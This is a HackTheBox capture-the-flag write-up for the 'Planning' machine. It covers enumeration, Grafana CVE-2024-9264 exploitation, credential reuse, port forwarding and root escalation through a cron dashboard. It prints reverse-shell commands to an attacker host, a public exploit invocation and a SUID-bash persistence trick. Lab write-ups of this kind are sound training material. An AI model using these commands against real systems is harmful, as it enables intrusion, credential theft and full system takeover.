All write-ups
5 min read

HackTheBox: Planning

HackTheBoxLinuxGrafanaCVE-2024-9264DockerPort Forwarding

HackTheBox: Planning

1. Reconnaissance

Initial host enumeration to discover exposed TCP services.

nmap -sC -sV 10.129.44.237

Results:

Standard subdomain fuzzing failed, but utilizing gobuster in vhost mode with the --append-domain flag revealed a hidden endpoint.

gobuster vhost -u http://planning.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 50

Discovery: grafana.planning.htb

2. Initial Access: Grafana Exploitation

Accessing the Grafana dashboard required authentication. The scenario provided starting credentials:

After authenticating, we identified the Grafana version and researched public vulnerabilities, leading to CVE-2024-9264 (Grafana SQL Expressions RCE).

Exploitation: Using a public PoC to spawn a reverse shell:

git clone https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit.git
python3 poc.py --url http://grafana.planning.htb/ --username admin --password '[REDACTED]' --reverse-ip <ATTACKER_IP> --reverse-port 9001

Result: Gained shell access inside a Docker container.

3. Container Escape & Lateral Movement

Within the container, executing env revealed environment variables containing administrative credentials for a local user.

# env
...
GF_SECURITY_ADMIN_PASSWORD=[REDACTED]
GF_SECURITY_ADMIN_USER=enzo
...

Leveraging these credentials, we established an SSH session to the host machine:

ssh enzo@planning.htb

Result: Gained host access as enzo. User flag secured ([REDACTED]).

4. Privilege Escalation

Checking sudo -l showed no elevated privileges for enzo. However, exploring /opt revealed a custom crontab database file (/opt/crontabs/crontab.db).

Crontab Analysis:

{"name":"Grafana backup","command":"/usr/bin/docker save root_grafana -o /var/backups/grafana.tar && /usr/bin/gzip /var/backups/grafana.tar && zip -P [REDACTED] /var/backups/grafana.tar.gz.zip /var/backups/grafana.tar.gz && rm /var/backups/grafana.tar.gz","schedule":"@daily"}

This disclosed a new password: [REDACTED].

Checking local listening ports:

ss -tulnp

Port 8000/tcp was listening locally. We utilized SSH local port forwarding to access this internal service from our attacker machine.

ssh -L 8888:127.0.0.1:8000 enzo@planning.htb

Navigating to http://127.0.0.1:8888 revealed a task scheduling dashboard. We authenticated using the root user and the password recovered from the crontab database ([REDACTED]).

Executing Malicious Cron Jobs

The dashboard permitted the creation and execution of custom cron jobs running as root. We created a task to execute a reverse shell:

bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1'

Alternatively, a stealthier privilege escalation involves creating a SUID bash binary:

# As enzo
cp /bin/bash /home/enzo/shell

# In the root cronjob:
chown root:root /home/enzo/shell && chmod 4755 /home/enzo/shell

After the cron job executed, running /home/enzo/shell -p granted a persistent root shell.

Result: root shell obtained. The root flag is located at /root/root.txt ([REDACTED]).